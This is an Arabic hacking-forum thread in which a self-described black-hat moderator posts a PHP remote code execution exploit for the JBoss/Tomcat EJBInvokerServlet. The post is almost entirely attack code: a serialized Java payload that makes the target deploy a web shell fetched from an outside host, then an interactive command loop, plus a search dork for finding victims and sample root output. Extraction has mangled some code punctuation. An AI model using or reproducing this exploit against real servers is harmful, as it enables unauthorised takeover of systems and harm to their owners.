نحن مع غزة
الـرئـيـسـيـة الـمـنـتـدى سـؤال & اجـابـة الـتـبـرع بـالـدم الاسـتـضـافـة هـلال لـيـنـكـس الـقـرآن الـكـريـم Dz-SeC team


التسجيل في المنتدى غير متاح حاليا, اذا كنت ترغب في الحصول على عضوية ارجو مراسلتي على البريد الالكتروني "[email protected]"


مطلوب مشرفين على كامل اقسام المنتدى


أخي / أختي , إن تسجيل عضوية جديدة في منتدى شبكة الجزائر للجميع لا يهدف إلى زيادة الأعضاء مطلقا
فلا خير في عضوية عدد مشاركاتها صفرا فنحن نرفض يوميا الكثير من العضويات المشكوك في أمرها
سواء كان هدفها الإعلانات الغير شرعية أو تخريب الموضوعات الخ , كل هذا حتى يبقى المنتدى
ساحة جادة عطرة تجود بالخير لكل زوارها وأعضائها
وصدقة جارية لكل من يشارك في كتابة معلومة تفيد غيره سوف يشكر الله عليها وهو في جوف الأرض ...

لذلك نطلب منك التسجيل بل ونلح عليك إن كان هدفك هو أن تصنع صدقة جارية لا تنقطع إلى يوم الدين بمساعدة إخوانك في نشر الخير .

للتسجيل اضغط هنا وأملأ البينات المطلوبة بشكل صحيح ومن ثم انتظر حتى نقوم بتفعيل حسابك وابدأ رحلتك في صناعة صدقة جارية .

وتذكر قول سيد الخلق " إذا مات ابن آدم انقطع عمله إلا من ثلاث صدقة جارية أو علم ينتفع به أو ولدٍ صالح يدعو له "

   

[ مـنتدى حمايه المواقع والسيرفرات | Hacking Site's & Servers ] حمايه وأختراق المواقع والسيرفرات باحدت الطرق والادوات ..

إضافة رد
 
أدوات الموضوع انواع عرض الموضوع
قديم 07/10/2013, 23:41   المشاركة رقم: 1
المعلومات
الكاتب:
 sniffer  
اللقب:
Moderator
الصورة الرمزية
 
الصورة الرمزية sniffer

البيانات
التسجيل : Jul 2013
العضوية : 5329
الاهتمامات :
الإقامة : Root
المواضيع : 20
الردود : 39
المجموع : 59
بمعدل : 0.01 يوميا
الاختراقات : [Sniffer]
مجتمعنا : [لم اسجل]
الصنف : Black Hat Hacker
آخر تواجد : 24/08/2015/18:34
سبب الغياب : حاظر
معدل التقييم: 13
نقاط التقييم: 10
sniffer is on a distinguished road
شكراً: 10
تم شكره 5 مرة في 4 مشاركة

 Algeria


الإتصالات
الحالة:
sniffer غير متواجد حالياً
وسائل الإتصال:

Wink apache tomcat remote 0day

كود PHP:
 <?php
/*
Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object 
Remote Code Execution
autor : rgod , exploit code Black-ID 
google dork: inurl:status EJBInvokerServlet 
 
this was used successfully on Windows during a penetration test against
McAfee Web Reporter 5.2.1 (tcp port 9111/http) gaining administrative privileges
see: http://www.mcafee.com/it/downloads/downloads.aspx
file tested: webreporter64bit.zip
 
Usage:
C:\PHP>php 9sg_ejb.php 192.168.0.1
tomcat-shell# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10
*/
 
$host $argv***91;1***93;;
$port $argv***91;2***93;;
 
//small jsp shell
//change this if you want, url to the app to be deployed, keep it short

$url "http://retrogod.altervista.org/a.war?"

function 
http_send($host$packet,$port)
{
    if ((
$sock fsockopen($host$port))){ 
    
fputs($sock$packet);
    return 
stream_get_contents($sock);
    }
}
 
$ulen pack("n",strlen($url));
  
$shcode01 =
    
"\xac\xed\x00\x05\x73\x72\x00\x29\x6f\x72\x67\x2e\x6a\x62\x6f\x73"// ....sr.) org.jbos
    
"\x73\x2e\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x4d\x61\x72"// s.invoca tion.Mar
    
"\x73\x68\x61\x6c\x6c\x65\x64\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f"// shalledI nvocatio
    
"\x6e\xf6\x06\x95\x27\x41\x3e\xa4\xbe\x0c\x00\x00\x78\x70\x70\x77"// n...'A>. ....xppw
    
"\x08\x78\x94\x98\x47\xc1\xd0\x53\x87\x73\x72\x00\x11\x6a\x61\x76"// .x..G..S .sr..jav
    
"\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67\x65\x72\x12\xe2"// a.lang.I nteger..
    
"\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75"// .....8.. .I..valu
    
"\x65\x78\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4e"// exr..jav a.lang.N
    
"\x75\x6d\x62\x65\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00"// umber... ........
    
"\x78\x70\x26\x95\xbe\x0a\x73\x72\x00\x24\x6f\x72\x67\x2e\x6a\x62"// xp&...sr .$org.jb
    
"\x6f\x73\x73\x2e\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x4d"// oss.invo cation.M
    
"\x61\x72\x73\x68\x61\x6c\x6c\x65\x64\x56\x61\x6c\x75\x65\xea\xcc"// arshalle dValue..
    
"\xe0\xd1\xf4\x4a\xd0\x99\x0c\x00\x00\x78\x70\x77";
 
$shcode02 "\x00";
 
$shcode03 =
    
"\xac\xed\x00\x05\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e".     // .....ur. .***91;Ljava.
    
"\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f"// lang.Obj ect;..X.
    
"\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00\x04\x73\x72\x00"// .s)l...x p....sr.
    
"\x1b\x6a\x61\x76\x61\x78\x2e\x6d\x61\x6e\x61\x67\x65\x6d\x65\x6e"// .javax.m anagemen
    
"\x74\x2e\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x0f\x03\xa7\x1b"// t.Object Name....
    
"\xeb\x6d\x15\xcf\x03\x00\x00\x78\x70\x74\x00\x21\x6a\x62\x6f\x73"// .m.....x pt.!jbos
    
"\x73\x2e\x73\x79\x73\x74\x65\x6d\x3a\x73\x65\x72\x76\x69\x63\x65"// s.system :service
    
"\x3d\x4d\x61\x69\x6e\x44\x65\x70\x6c\x6f\x79\x65\x72\x78\x74\x00"// =MainDep loyerxt.
    
"\x06\x64\x65\x70\x6c\x6f\x79\x75\x71\x00\x7e\x00\x00\x00\x00\x00"// .deployu q.~.....
    
"\x01\x74".
    
$ulen.
    
$url.
    
"\x75\x72\x00".
    
"\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61".                         // ur..***91; Ljava.la
    
"\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d"// ng.Strin g;..V...
    
"\x7b\x47\x02\x00\x00\x78\x70\x00\x00\x00\x01\x74\x00\x10\x6a\x61"// {G...xp. ...t..ja
    
"\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67";
 
$shcode04 =
    
"\x0d\xd3"
    
"\xbe\xc9\x78\x77\x04\x00\x00\x00\x01\x73\x72\x00\x22\x6f\x72\x67"// ..xw.... .sr."org
    
"\x2e\x6a\x62\x6f\x73\x73\x2e\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f"// .jboss.i nvocatio
    
"\x6e\x2e\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x4b\x65\x79\xb8"// n.Invoca tionKey.
    
"\xfb\x72\x84\xd7\x93\x85\xf9\x02\x00\x01\x49\x00\x07\x6f\x72\x64"// .r...... ..I..ord
    
"\x69\x6e\x61\x6c\x78\x70\x00\x00\x00\x05\x73\x71\x00\x7e\x00\x05"// inalxp.. ..sq.~..
    
"\x77\x0d\x00\x00\x00\x05\xac\xed\x00\x05\x70\xfb\x57\xa7\xaa\x78"// w....... ..p.W..x
    
"\x77\x04\x00\x00\x00\x03\x73\x71\x00\x7e\x00\x07\x00\x00\x00\x04"// w.....sq .~......
    
"\x73\x72\x00\x23\x6f\x72\x67\x2e\x6a\x62\x6f\x73\x73\x2e\x69\x6e"// sr.#org. jboss.in
    
"\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x49\x6e\x76\x6f\x63\x61\x74"// vocation .Invocat
    
"\x69\x6f\x6e\x54\x79\x70\x65\x59\xa7\x3a\x1c\xa5\x2b\x7c\xbf\x02"// ionTypeY .:..+|..
    
"\x00\x01\x49\x00\x07\x6f\x72\x64\x69\x6e\x61\x6c\x78\x70\x00\x00"// ..I..ord inalxp..
    
"\x00\x01\x73\x71\x00\x7e\x00\x07\x00\x00\x00\x0a\x70\x74\x00\x0f"// ..sq.~.. ....pt..
    
"\x4a\x4d\x58\x5f\x4f\x42\x4a\x45\x43\x54\x5f\x4e\x41\x4d\x45\x73"// JMX_OBJE CT_NAMEs
    
"\x72\x00\x1b\x6a\x61\x76\x61\x78\x2e\x6d\x61\x6e\x61\x67\x65\x6d"// r..javax .managem
    
"\x65\x6e\x74\x2e\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x0f\x03"// ent.Obje ctName..
    
"\xa7\x1b\xeb\x6d\x15\xcf\x03\x00\x00\x78\x70\x74\x00\x21\x6a\x62"// ...m.... .xpt.!jb
    
"\x6f\x73\x73\x2e\x73\x79\x73\x74\x65\x6d\x3a\x73\x65\x72\x76\x69"// oss.syst em:servi
    
"\x63\x65\x3d\x4d\x61\x69\x6e\x44\x65\x70\x6c\x6f\x79\x65\x72\x78"// ce=MainD eployerx
    
"\x78";                                                             // x

    
$payload $shcode01.pack("v",strlen($shcode03)+8).$shcode02.pack("n",strlen($shcode03)).$shcode03.$shcode04;
 
    
$packet "POST /invoker/EJBInvokerServlet/ HTTP/1.1\r\n";
    
$packet .= "ContentType: application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation\r\n";
    
$packet .= "Accept-Encoding: x-gzip,x-deflate,gzip,deflate\r\n";
    
$packet .= "User-Agent: Java/1.6.0_21\r\n";
    
$packet .= "Host: ".$host.":".$port."\r\n";
    
$packet .= "Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2\r\n";
    
$packet .= "Connection: keep-alive\r\n";
    
$packet .= "Content-type: application/x-www-form-urlencoded\r\n";
    
$packet .= "Content-Length: ".strlen($payload)."\r\n\r\n{$payload}";
    
http_send($host,$packet,$port); 
    
sleep(5);
 
while(
1)
{
    print 
"\ntomcat-shell# ";
    if ((
$cmd trim(fgets(STDIN))) == "exit") break;
    
$packet  "GET /a/pwn.jsp?cmd=".urlencode($cmd)." HTTP/1.1\r\n";
    
$packet .= "Host: {$host}\r\n";
    
$packet .= "Connection: close\r\n\r\n";
    
preg_match('/Connection: close\r\n\r\n(.*)\n/s'http_send($host,$packet,$port), $m);
    print 
$m***91;1***93;;
    
#print http_send($host,$packet,$port);
}
?>



آخر مواضيع » sniffer

عرض البوم صور sniffer   رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


حالياً الأعضاء النشيطين الذين يشاهدون هذا الموضوع : 1 (0 عضو و 1 ضيف)
 

(أظهر الكل الأعضاء الذين قاموا بمشاهدة هذا الموضوع : 4
3nj0y , Black-ID , S1LV3rS3rf3r , sniffer

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
[remote exploits] - Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI ov ADMINISTRATOR قسم الثغرات 0 05/10/2013 00:00
[remote] - Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) ADMINISTRATOR قسم الثغرات 0 04/10/2013 18:06
[remote exploits] - Apache Struts includeParams Remote Code Execution ADMINISTRATOR قسم الثغرات 0 03/06/2013 04:56
[remote exploits] - Apache Struts ParametersInterceptor Remote Code Execution ADMINISTRATOR قسم الثغرات 0 22/03/2013 06:11
[webapps / 0day] - Apache Struts2 Remote Code Execution ADMINISTRATOR قسم الثغرات 0 23/08/2012 18:30

الساعة معتمدة بتوقيت جرينتش +1 . الساعة الآن : 00:56.
Copy Right Des 2010 - 2014 To is|sec Organization, Des By  yasMouh 
Powered By vBulletin Special Edition, Secured By Dz-SeC team
Support by Dz-SeC team




RSS RSS 2.0 XML MAP HTML



 
 
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115